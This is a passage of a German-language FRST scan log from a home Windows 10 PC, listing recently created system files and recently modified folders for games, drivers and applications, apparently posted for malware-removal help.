- 001171968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certutil.exe 2017-07-11 20:54 - 2017-06-20 06:38 - 000663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll 2017-07-11 20:54 - 2017-06-20 06:38 - 000648192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SmartcardCredentialProvider.dll 2017-07-11 20:54 - 2017-06-20 06:37 - 002008576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl 2017-07-11 20:54 - 2017-06-20 06:35 - 002679296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll 2017-07-11 20:54 - 2017-06-20 06:35 - 002132480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll 2017-07-11 20:54 - 2017-06-20 06:35 - 000050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll 2017-07-11 20:54 - 2017-06-20 06:34 - 002750464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll 2017-07-11 20:54 - 2017-06-20 06:34 - 001492480 _____ (Microsoft Corporation) 
C:\WINDOWS\SysWOW64\Windows.Devices.Bluetooth.dll 2017-07-11 20:54 - 2017-06-20 06:31 - 000334848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToDevice.dll 2017-07-11 20:54 - 2017-06-20 06:30 - 000209920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wdmaud.drv 2017-07-11 20:54 - 2017-06-20 06:30 - 000157696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpchttp.dll 2017-07-11 20:54 - 2017-06-20 06:30 - 000089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll 2017-07-11 20:54 - 2017-06-20 06:28 - 000584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apphelp.dll 2017-07-11 20:53 - 2017-07-07 09:27 - 001147288 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe 2017-07-11 20:53 - 2017-07-07 09:27 - 001024928 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe 2017-07-11 20:53 - 2017-07-07 09:27 - 000965024 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.efi 2017-07-11 20:53 - 2017-07-07 09:27 - 000821664 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.exe 2017-07-11 20:53 - 2017-07-07 09:27 - 000750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe 2017-07-11 20:53 - 2017-07-07 09:26 - 001065104 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi 2017-07-11 20:53 - 2017-07-07 09:25 - 000899824 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe 2017-07-11 20:53 - 2017-07-07 09:22 - 001186464 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe 2017-07-11 20:53 - 2017-07-07 09:17 - 001017760 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi 2017-07-11 20:53 - 2017-07-07 09:14 - 001760264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll 2017-07-11 20:53 - 2017-07-07 09:14 - 001171032 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcomp.dll 2017-07-11 20:53 - 2017-07-07 09:13 - 000147800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Clipc.dll 2017-07-11 20:53 - 2017-07-07 09:12 - 000228256 _____ 
(Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys 2017-07-11 20:53 - 2017-07-07 09:10 - 000372128 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll 2017-07-11 20:53 - 2017-07-07 09:09 - 000041376 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininitext.dll 2017-07-11 20:53 - 2017-07-07 08:27 - 001640448 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll 2017-07-11 20:53 - 2017-07-07 08:27 - 000859136 _____ (Microsoft Corporation) C:\WINDOWS\system32\uDWM.dll 2017-07-11 20:53 - 2017-07-07 08:27 - 000577024 _____ (Microsoft Corporation) C:\WINDOWS\system32\duser.dll 2017-07-11 20:53 - 2017-07-07 08:27 - 000443392 _____ (Microsoft Corporation) C:\WINDOWS\system32\PerceptionSimulationExtensions.dll 2017-07-11 20:53 - 2017-07-07 08:27 - 000360960 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConhostV2.dll 2017-07-11 20:53 - 2017-07-07 08:23 - 000029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapprovp.dll 2017-07-11 20:53 - 2017-07-07 08:22 - 000520704 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll 2017-07-11 20:53 - 2017-07-07 08:21 - 000096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncCsp.dll 2017-07-11 20:53 - 2017-07-07 08:19 - 000256000 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll 2017-07-11 20:53 - 2017-07-07 08:19 - 000137216 _____ (Microsoft Corporation) C:\WINDOWS\system32\raschap.dll 2017-07-11 20:53 - 2017-07-07 08:18 - 000563712 _____ (Microsoft Corporation) C:\WINDOWS\system32\DevicePairing.dll 2017-07-11 20:53 - 2017-07-07 08:18 - 000353280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Wldap32.dll 2017-07-11 20:53 - 2017-07-07 08:18 - 000274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecsExt.dll 2017-07-11 20:53 - 2017-07-07 08:15 - 000922112 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll 2017-07-11 20:53 - 2017-07-07 08:13 - 005892096 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll 2017-07-11 
20:53 - 2017-07-07 08:13 - 000840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll 2017-07-11 20:53 - 2017-07-07 08:12 - 003307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll 2017-07-11 20:53 - 2017-07-07 08:12 - 002499584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll 2017-07-11 20:53 - 2017-07-07 08:12 - 001713664 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncProvider.dll 2017-07-11 20:53 - 2017-07-07 08:12 - 001420800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Maps.dll 2017-07-11 20:53 - 2017-07-07 08:11 - 003139584 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll 2017-07-11 20:53 - 2017-07-07 08:11 - 002829824 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll 2017-07-11 20:53 - 2017-07-07 08:11 - 002649600 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll 2017-07-11 20:53 - 2017-07-07 08:11 - 002177024 _____ (Microsoft Corporation) C:\WINDOWS\system32\OpcServices.dll 2017-07-11 20:53 - 2017-07-07 08:11 - 001888256 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll 2017-07-11 20:53 - 2017-07-07 08:07 - 000430080 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToDevice.dll 2017-07-11 20:53 - 2017-07-07 08:07 - 000391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPhoto.dll 2017-07-11 20:53 - 2017-07-07 08:05 - 000370176 _____ (Microsoft Corporation) C:\WINDOWS\system32\msinfo32.exe 2017-07-11 20:53 - 2017-07-07 08:04 - 001703424 _____ (Microsoft Corporation) C:\WINDOWS\system32\aitstatic.exe 2017-07-11 20:53 - 2017-07-07 08:04 - 001403392 _____ (Microsoft Corporation) C:\WINDOWS\system32\wdc.dll 2017-07-11 20:53 - 2017-07-07 08:04 - 000058368 _____ (Microsoft Corporation) C:\WINDOWS\system32\csrsrv.dll 2017-07-11 20:53 - 2017-07-02 00:52 - 000031932 _____ C:\WINDOWS\system32\edgehtmlpluginpolicy.bin 2017-07-11 20:53 - 2017-06-20 08:18 - 001564576 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll 
2017-07-11 20:53 - 2017-06-20 08:18 - 000096672 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe 2017-07-11 20:53 - 2017-06-20 08:17 - 000629152 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll 2017-07-11 20:53 - 2017-06-20 08:17 - 000544160 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll 2017-07-11 20:53 - 2017-06-20 08:17 - 000334240 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll 2017-07-11 20:53 - 2017-06-20 08:17 - 000136096 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll 2017-07-11 20:53 - 2017-06-20 08:17 - 000034720 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe 2017-07-11 20:53 - 2017-06-20 08:16 - 001214880 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll 2017-07-11 20:53 - 2017-06-20 08:16 - 000335776 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcntel.dll 2017-07-11 20:53 - 2017-06-20 08:15 - 000233376 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll 2017-07-11 20:53 - 2017-06-20 08:11 - 001395152 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi 2017-07-11 20:53 - 2017-06-20 08:10 - 001930320 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll 2017-07-11 20:53 - 2017-06-20 08:05 - 001057832 _____ (Microsoft Corporation) C:\WINDOWS\system32\MrmCoreR.dll 2017-07-11 20:53 - 2017-06-20 08:04 - 004847424 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe 2017-07-11 20:53 - 2017-06-20 08:03 - 000179608 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostUser.dll 2017-07-11 20:53 - 2017-06-20 08:03 - 000102312 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredentialUIBroker.exe 2017-07-11 20:53 - 2017-06-20 08:02 - 000426912 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostCommon.dll 2017-07-11 20:53 - 2017-06-20 08:00 - 000558920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.dll 2017-07-11 20:53 - 2017-06-20 08:00 - 000255904 _____ 
(Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll 2017-07-11 20:53 - 2017-06-20 08:00 - 000142752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys 2017-07-11 20:53 - 2017-06-20 07:59 - 000583304 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe 2017-07-11 20:53 - 2017-06-20 07:58 - 000833160 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeManagerObj.dll 2017-07-11 20:53 - 2017-06-20 07:58 - 000406072 _____ (Microsoft Corporation) C:\WINDOWS\system32\MMDevAPI.dll 2017-07-11 20:53 - 2017-06-20 07:58 - 000203168 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostBroker.dll 2017-07-11 20:53 - 2017-06-20 07:16 - 000970752 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctfuimanager.dll 2017-07-11 20:53 - 2017-06-20 07:16 - 000417280 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleacc.dll 2017-07-11 20:53 - 2017-06-20 07:15 - 001620368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll 2017-07-11 20:53 - 2017-06-20 07:14 - 001150784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll 2017-07-11 20:53 - 2017-06-20 07:14 - 000032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mskssrv.sys 2017-07-11 20:53 - 2017-06-20 07:13 - 000216064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Profiles.Gatt.Interface.dll 2017-07-11 20:53 - 2017-06-20 07:13 - 000081408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanprotdim.dll 2017-07-11 20:53 - 2017-06-20 07:13 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\WFDSConMgr.dll 2017-07-11 20:53 - 2017-06-20 07:12 - 000144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.Profile.RetailInfo.dll 2017-07-11 20:53 - 2017-06-20 07:11 - 000200192 _____ (Microsoft Corporation) C:\WINDOWS\system32\ScDeviceEnum.dll 2017-07-11 20:53 - 2017-06-20 07:10 - 000315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll 2017-07-11 20:53 - 
2017-06-20 07:10 - 000188928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincredui.dll 2017-07-11 20:53 - 2017-06-20 07:09 - 000555008 _____ (Microsoft Corporation) C:\WINDOWS\system32\WFDSConMgrSvc.dll 2017-07-11 20:53 - 2017-06-20 07:09 - 000427008 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll 2017-07-11 20:53 - 2017-06-20 07:09 - 000250368 _____ (Microsoft Corporation) C:\WINDOWS\system32\SCardSvr.dll 2017-07-11 20:53 - 2017-06-20 07:09 - 000205312 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipboardServer.dll 2017-07-11 20:53 - 2017-06-20 07:09 - 000189952 _____ (Microsoft Corporation) C:\WINDOWS\system32\certprop.dll 2017-07-11 20:53 - 2017-06-20 07:09 - 000135680 _____ (Microsoft Corporation) C:\WINDOWS\system32\sendmail.dll 2017-07-11 20:53 - 2017-06-20 07:09 - 000062464 _____ (Microsoft Corporation) C:\WINDOWS\system32\dataclen.dll 2017-07-11 20:53 - 2017-06-20 07:08 - 000791040 _____ (Microsoft Corporation) C:\WINDOWS\system32\certca.dll 2017-07-11 20:53 - 2017-06-20 07:07 - 000916992 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe 2017-07-11 20:53 - 2017-06-20 07:07 - 000757248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys 2017-07-11 20:53 - 2017-06-20 07:07 - 000626176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Bluetooth.dll 2017-07-11 20:53 - 2017-06-20 07:07 - 000621056 _____ (Microsoft Corporation) C:\WINDOWS\system32\SndVolSSO.dll 2017-07-11 20:53 - 2017-06-20 07:07 - 000411136 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll 2017-07-11 20:53 - 2017-06-20 07:06 - 000455680 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll 2017-07-11 20:53 - 2017-06-20 07:06 - 000335872 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudDomainJoinDataModelServer.dll 2017-07-11 20:53 - 2017-06-20 07:06 - 000299520 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll 2017-07-11 20:53 - 2017-06-20 07:06 - 000253440 _____ 
(Microsoft Corporation) C:\WINDOWS\system32\edputil.dll 2017-07-11 20:53 - 2017-06-20 07:06 - 000045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBrokerUI.dll 2017-07-11 20:53 - 2017-06-20 07:05 - 002873344 _____ (Microsoft Corporation) C:\WINDOWS\system32\themeui.dll 2017-07-11 20:53 - 2017-06-20 07:05 - 000873472 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll 2017-07-11 20:53 - 2017-06-20 07:05 - 000696320 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmsys.cpl 2017-07-11 20:53 - 2017-06-20 07:05 - 000406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll 2017-07-11 20:53 - 2017-06-20 07:05 - 000056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll 2017-07-11 20:53 - 2017-06-20 07:04 - 001818624 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll 2017-07-11 20:53 - 2017-06-20 07:04 - 001425920 _____ (Microsoft Corporation) C:\WINDOWS\system32\certutil.exe 2017-07-11 20:53 - 2017-06-20 07:04 - 000899072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmartcardCredentialProvider.dll 2017-07-11 20:53 - 2017-06-20 07:04 - 000802816 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll 2017-07-11 20:53 - 2017-06-20 07:04 - 000400896 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXTaskFactory.dll 2017-07-11 20:53 - 2017-06-20 07:04 - 000178176 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeHelper.dll 2017-07-11 20:53 - 2017-06-20 07:02 - 000681984 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll 2017-07-11 20:53 - 2017-06-20 07:02 - 000081920 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudDomainJoinAUG.dll 2017-07-11 20:53 - 2017-06-20 07:01 - 003803136 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll 2017-07-11 20:53 - 2017-06-20 07:01 - 003332096 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll 2017-07-11 20:53 - 2017-06-20 07:01 - 003059200 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\NetworkMobileSettings.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 001076736 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 000397312 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll
2017-07-11 20:53 - 2017-06-20 07:00 - 003057664 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll
2017-07-11 20:53 - 2017-06-20 07:00 - 002171392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Bluetooth.dll
2017-07-11 20:53 - 2017-06-20 06:57 - 000290816 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmclient.exe
2017-07-11 20:53 - 2017-06-20 06:57 - 000138752 _____ (Microsoft Corporation) C:\WINDOWS\system32\DMPushRouterCore.dll
2017-07-11 20:53 - 2017-06-20 06:56 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\system32\wdmaud.drv

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-08-09 18:59 - 2017-03-23 02:42 - 000000000 ____D C:\FRST
2017-08-09 18:57 - 2017-04-19 20:10 - 000000000 ____D C:\ProgramData\NVIDIA
2017-08-09 18:56 - 2015-03-01 21:28 - 000000000 ____D C:\Users\***\AppData\Roaming\Skype
2017-08-09 18:55 - 2017-03-18 23:01 - 000000000 ____D C:\WINDOWS\INF
2017-08-09 18:55 - 2015-11-03 03:16 - 000000000 ____D C:\AdwCleaner
2017-08-09 18:54 - 2016-07-13 19:39 - 000000000 ____D C:\Users\***\AppData\Local\Spotify
2017-08-09 18:53 - 2016-07-13 19:39 - 000000000 ____D C:\Users\***\AppData\Roaming\Spotify
2017-08-09 18:47 - 2017-04-19 20:20 - 004124406 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-08-09 18:47 - 2017-03-20 06:35 - 002023472 _____ C:\WINDOWS\system32\perfh007.dat
2017-08-09 18:47 - 2017-03-20 06:35 - 000514080 _____ C:\WINDOWS\system32\perfc007.dat
2017-08-09 18:46 - 2017-03-18 23:03 - 000000000 ___HD C:\Program Files\WindowsApps
2017-08-09 18:46 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\AppReadiness
2017-08-09 18:46 - 2015-02-06 18:49 - 000000000 ____D C:\Users\***\AppData\Local\Packages
2017-08-09 18:40 - 2017-04-19 20:15 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-08-09 18:40 - 2017-04-19 20:10 - 000000000 ____D C:\Users\***
2017-08-09 18:40 - 2017-04-19 20:09 - 000248024 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-08-08 23:15 - 2017-04-19 20:09 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2017-08-08 23:04 - 2015-02-07 15:26 - 000000000 ____D C:\Users\***\AppData\Roaming\Dropbox
2017-08-08 20:32 - 2015-04-10 22:33 - 000000000 ____D C:\Users\***\AppData\Roaming\TS3Client
2017-08-08 19:54 - 2015-02-06 18:47 - 000000000 __RHD C:\Users\Public\AccountPictures
2017-08-08 19:53 - 2017-03-18 23:03 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-08-08 19:53 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\SysWOW64\WinMetadata
2017-08-08 19:53 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\WinMetadata
2017-08-08 19:53 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2017-08-08 19:53 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\oobe
2017-08-08 19:53 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\ShellExperiences
2017-08-08 19:53 - 2017-03-18 23:03 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2017-08-08 19:53 - 2017-03-18 23:03 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2017-08-08 19:53 - 2017-03-18 13:40 - 001048576 _____ C:\WINDOWS\system32\config\BBI
2017-08-08 19:28 - 2017-05-09 20:16 - 000000000 ____D C:\WINDOWS\CbsTemp
2017-08-08 19:28 - 2015-02-06 20:57 - 000000000 ____D C:\WINDOWS\system32\MRT
2017-08-08 19:26 - 2015-02-06 20:57 - 140394280 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-08-08 17:25 - 2017-04-19 20:15 - 000004182 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{87C32643-1831-40C5-90AB-019E81221598}
2017-08-07 23:51 - 2017-03-11 14:12 - 000000000 ____D C:\ProgramData\IObit
2017-08-07 23:51 - 2015-03-15 23:24 - 000000000 ____D C:\Users\***\AppData\Roaming\IObit
2017-08-07 23:51 - 2015-03-15 23:24 - 000000000 ____D C:\Users\***\AppData\LocalLow\IObit
2017-08-07 23:31 - 2015-03-09 00:28 - 000000000 ____D C:\Users\***\AppData\Local\Ubisoft Game Launcher
2017-08-07 19:35 - 2017-05-17 19:05 - 000000000 ____D C:\Users\***\AppData\Local\b95cd
2017-08-07 19:15 - 2017-05-02 14:50 - 000000988 _____ C:\Users\Public\Desktop\TomTom MyDrive Connect.lnk
2017-08-07 03:30 - 2016-01-03 14:51 - 000000000 ____D C:\Users\***\AppData\Local\CrashDumps
2017-08-06 16:31 - 2017-04-18 18:59 - 000001457 _____ C:\Users\***\Desktop\KCD.lnk
2017-08-06 13:21 - 2015-02-06 20:34 - 000000000 ____D C:\Users\***\Documents\The Lord of the Rings Online
2017-08-06 12:40 - 2015-02-06 20:39 - 000000000 ____D C:\Users\***\AppData\Local\Turbine
2017-08-06 01:00 - 2015-04-04 15:53 - 000000000 ____D C:\Program Files\GIMP 2
2017-08-06 00:35 - 2015-03-15 23:53 - 000000000 ____D C:\Program Files (x86)\Java
2017-08-06 00:28 - 2015-02-06 19:17 - 000000000 ____D C:\ProgramData\Oracle
2017-08-06 00:28 - 2015-02-06 19:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2017-08-06 00:26 - 2017-05-02 17:37 - 000002170 _____ C:\Users\Public\Desktop\Smart Switch.lnk
2017-08-06 00:25 - 2017-04-06 21:53 - 000000000 ____D C:\Users\***\AppData\Roaming\MyPhoneExplorer
2017-08-06 00:20 - 2015-03-15 23:24 - 000000000 ____D C:\Program Files (x86)\IObit
2017-08-06 00:12 - 2015-02-06 19:58 - 000000000 ____D C:\Users\***\AppData\Local\Battle.net
2017-08-05 23:25 - 2015-02-06 20:19 - 000000000 ____D C:\ProgramData\Package Cache
2017-08-05 23:20 - 2015-05-19 11:35 - 000000000 ____D C:\GOG Games
2017-08-05 23:04 - 2017-03-18 13:40 - 000032768 _____ C:\WINDOWS\system32\config\ELAM
2017-08-05 23:04 - 2015-02-06 19:51 - 000565416 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2017-08-05 23:00 - 2016-06-12 12:19 - 000000000 ____D C:\Program Files (x86)\Adobe
2017-08-03 20:00 - 2017-05-09 19:18 - 000000626 _____ C:\Users\Martin
2017-08-01 14:04 - 2015-06-16 18:56 - 000000000 ____D C:\Users\***\AppData\Local\Dropbox
2017-08-01 14:04 - 2015-02-07 15:28 - 000000000 ___RD C:\Users\***\Dropbox
2017-08-01 03:15 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\rescache
2017-08-01 02:04 - 2015-12-12 16:08 - 000000000 ____D C:\Users\***\AppData\Roaming\Mozilla
2017-08-01 01:54 - 2015-02-06 18:54 - 000000000 ____D C:\Users\***\AppData\Local\Google
2017-08-01 01:54 - 2015-02-06 18:54 - 000000000 ____D C:\Program Files (x86)\Google
2017-07-31 20:56 - 2015-02-06 19:26 - 000000000 ____D C:\Users\***\AppData\Roaming\Origin
2017-07-31 20:56 - 2015-02-06 19:25 - 000000000 ____D C:\ProgramData\Origin
2017-07-31 20:21 - 2016-11-04 22:04 - 000000000 ____D C:\Users\***\Documents\Darkest
2017-07-31 20:21 - 2015-05-19 13:16 - 000000000 ____D C:\Users\***\Documents\The Witcher 3
2017-07-31 20:17 - 2015-05-19 12:54 - 000000000 ____D C:\Program Files (x86)\GalaxyClient
2017-07-31 20:02 - 2016-05-04 20:53 - 000000000 ____D C:\ProgramData\Logitech
2017-07-31 20:02 - 2016-05-04 17:52 - 000000000 ____D C:\ProgramData\Squeezebox
2017-07-31 20:02 - 2016-05-02 22:30 - 000000000 ____D C:\Program Files (x86)\Logitech
2017-07-28 19:41 - 2017-04-19 20:10 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2017-07-28 19:41 - 2016-03-11 21:30 - 000000000 ____D C:\Program Files (x86)\VulkanRT
2017-07-28 19:41 - 2015-02-03 17:22 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2017-07-28 18:14 - 2017-04-19 20:10 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2017-07-28 18:14 - 2017-04-19 20:10 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2017-07-28 18:14 - 2016-09-29 12:59 - 000001481 _____ C:\Users\Public\Desktop\GeForce Experience.lnk
2017-07-28 18:06 - 2015-04-28 22:14 - 000000865 _____ C:\Users\Public\Desktop\CCleaner.lnk
2017-07-26 23:16 - 2017-03-06 22:52 - 000000000 ____D C:\Users\***\AppData\Roaming\discord
2017-07-26 23:16 - 2017-03-06 22:52 - 000000000 ____D C:\Users\***\AppData\Local\Discord
2017-07-26 19:09 - 2016-09-29 12:59 - 001755072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspbridge64.dll
2017-07-26 19:09 - 2016-09-29 12:59 - 001317312 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspbridge.dll
2017-07-26 19:09 - 2016-09-29 12:59 - 000121280 _____ C:\WINDOWS\system32\NvRtmpStreamer64.dll
2017-07-26 15:40 - 2017-04-06 19:59 - 000001951 _____ C:\WINDOWS\NvTelemetryContainerRecovery.bat
2017-07-19 01:24 - 2017-05-06 18:18 - 000069752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvshext.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 006463608 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 002479040 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvc64.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 001762936 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvcr.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 000549312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshext.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 000392312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmctray.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 000081856 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshextr.dll
2017-07-19 00:54 - 2017-04-19 20:10 - 000001951 _____ C:\WINDOWS\NvContainerRecovery.bat
2017-07-18 13:23 - 2015-03-01 21:28 - 000000000 ____D C:\ProgramData\Skype
2017-07-15 22:51 - 2017-03-31 19:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Darkest Dungeon [GOG.com]
2017-07-13 03:37 - 2017-04-19 20:10 - 008095171 _____ C:\WINDOWS\system32\nvcoproc.bin
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___SD C:\WINDOWS\system32\F12
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___RD C:\Program Files\Windows Defender
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\migwiz
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\appraiser
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\Program Files (x86)\Windows Defender

